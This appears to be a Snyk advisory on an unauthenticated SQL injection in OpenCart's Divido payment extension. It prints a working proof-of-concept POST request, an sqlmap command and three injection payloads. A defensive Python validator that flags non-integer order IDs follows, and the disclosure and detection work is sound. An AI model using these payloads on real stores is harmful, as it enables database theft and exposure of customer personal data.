Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade opencart/opencart to version 3.0.4.0 or higher.
opencart/opencart is a shopping cart system.
Affected versions of this package are vulnerable to SQL Injection. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data.
This can be exploited with a POST request to /index.php?route=extension/payment/divido/update, which will delay the response for 5 seconds.
POST http://localhost/index.php?route=extension/payment/divido/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/json
content-length: 44

{"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}
Feeding this request to sqlmap, it identified three different payload types:
python3 sqlmap.py -vv -r /tmp/oc2.raw --level 3 --risk 2
...
Parameter: JSON #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: {"status":true,"metadata":{"order_id":"1 AND 7610=(SELECT (CASE WHEN (7610=7610) THEN 7610 ELSE (SELECT 7298 UNION SELECT 8143) END))-- -"}}
    Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: {"status":true,"metadata":{"order_id":"1 AND EXTRACTVALUE(2524,CONCAT(0x5c,0x716a7a6a71,(SELECT (ELT(2524=2524,1))),0x71716b7071))"}}
    Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
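The root cause is that metadata.order_id reaches a query without being constrained to the integer the handler expects, so a defender can flag this route on type alone rather than on keyword signatures. The following is an added example, not code from OpenCart, the Divido extension or Snyk: a strict integer check of the kind a fixed handler or a request-inspection layer should apply, run over constructed sample requests (the three sqlmap payloads quoted above, one benign callback, and one request to an unrelated route); the hostname and the record layout are assumptions.

```python
import json
from typing import Any, Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Route named in the advisory; the handler expects metadata.order_id to be an integer.
DIVIDO_UPDATE_ROUTE = "extension/payment/divido/update"

def strict_int(value: Any) -> Optional[int]:
    """Allow-list check: a real int or a string of ASCII digits, nothing else.
    bool is excluded because it subclasses int; isascii() rejects Unicode digits."""
    if isinstance(value, bool):
        return None
    if isinstance(value, int):
        return value
    if isinstance(value, str) and value.isascii() and value.isdigit():
        return int(value)
    return None

def inspect_request(method: str, url: str, body: str) -> Dict[str, Any]:
    """Classify one request to the Divido callback. Any order_id that is not a
    well-formed integer is flagged, which covers boolean, error and time-based
    payloads alike without matching on keywords such as SLEEP or EXTRACTVALUE."""
    route = parse_qs(urlparse(url).query).get("route", [])
    if method.upper() != "POST" or DIVIDO_UPDATE_ROUTE not in route:
        return {"suspicious": False, "reason": "not the divido update route"}
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return {"suspicious": True, "reason": "body is not valid JSON"}
    meta = data.get("metadata") if isinstance(data, dict) else None
    order_id = meta.get("order_id") if isinstance(meta, dict) else None
    if strict_int(order_id) is None:
        return {"suspicious": True, "reason": "order_id is not an integer: %r" % (order_id,)}
    return {"suspicious": False, "reason": "order_id well-formed"}

# Constructed sample requests: the three sqlmap payloads from the advisory, one benign
# callback, and one POST to an unrelated route. The hostname is a placeholder.
ROUTE_URL = "http://shop.example/index.php?route=" + DIVIDO_UPDATE_ROUTE
SAMPLES: List[Tuple[str, str, str]] = [
    ("POST", ROUTE_URL, '{"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}'),
    ("POST", ROUTE_URL, '{"status":true,"metadata":{"order_id":"1 AND 7610=(SELECT (CASE WHEN (7610=7610) THEN 7610 ELSE (SELECT 7298 UNION SELECT 8143) END))-- -"}}'),
    ("POST", ROUTE_URL, '{"status":true,"metadata":{"order_id":"1 AND EXTRACTVALUE(2524,CONCAT(0x5c,0x716a7a6a71,(SELECT (ELT(2524=2524,1))),0x71716b7071))"}}'),
    ("POST", ROUTE_URL, '{"status":true,"metadata":{"order_id":"17"}}'),
    ("POST", "http://shop.example/index.php?route=common/home", '{"metadata":{"order_id":"1 OR 1=1"}}'),
]

def triage(samples: List[Tuple[str, str, str]]) -> List[bool]:
    """Return the suspicious flag for each sample, in order."""
    return [inspect_request(*s)["suspicious"] for s in samples]
```

Because the check is an allow-list on the expected type, a well-formed callback passes and every non-numeric order_id is flagged regardless of which injection technique it carries.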